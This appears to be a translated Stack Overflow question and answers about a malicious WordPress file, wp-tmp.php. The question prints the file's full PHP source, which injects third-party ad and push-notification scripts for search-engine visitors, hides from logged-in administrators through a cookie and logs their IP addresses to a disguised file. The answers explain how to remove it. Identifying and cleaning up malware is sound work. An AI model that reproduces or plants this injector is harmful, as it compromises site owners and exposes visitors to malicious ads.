首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >病毒wp-tmp.php在WordPress上能做什么?

病毒wp-tmp.php在WordPress上能做什么?
EN

Stack Overflow用户
提问于 2018-10-19 17:55:20
回答 2查看 5.3K关注 0票数 1

我在wp- WordPress / Files上发现了这种病毒,该病毒通过siteguarding.com和其他文件进行扫描,并发现错误的脚本广告。

这个内容文件"wp-tmp.php“:

代码语言:javascript
复制
ini_set('display_errors', 0);
error_reporting(0);
$anx='a107e0b262722f0cea3f7ce097597b7c';
if ( ! function_exists( 'slider_option' ) ) {  


function slider_option($content){ 
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1412000"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1412002&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
	$sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 





}

这个文件是干什么用的?怎么知道那个文件是插入在我的网站文件根目录上的?我与siteguarding.com支持部门进行了交谈,并告诉我“您的网站被黑了”wp-include/wp-tmp.php- 100%病毒up/include/Functions.php- 100%您在黑名单中

EN

回答 2

Stack Overflow用户

回答已采纳

发布于 2018-10-19 18:10:17

这是恶意软件,这个文件肯定不是WP的一部分。删除文件,编辑文件夹权限,搜索文件以查找其他恶意代码。更新WP和你的插件。

票数 0
EN

Stack Overflow用户

发布于 2019-05-20 03:05:35

此文件使用IO,有时会导致404,500和数据库连接问题。

该文件使用主题funtions.php注入代码(恶意软件)。

该文件注入的代码从functions.php的第1行开始,并以// themes这样的注释结束。

解决方案是首先从/wp-中删除wp-tmp.php和wp-vcd.php,并从functions.php中删除代码,并为父主题和子主题将functions.php权限设置为0555或0444< code >E29。使此恶意软件无法写入functions.php。

票数 1
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/52897669

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档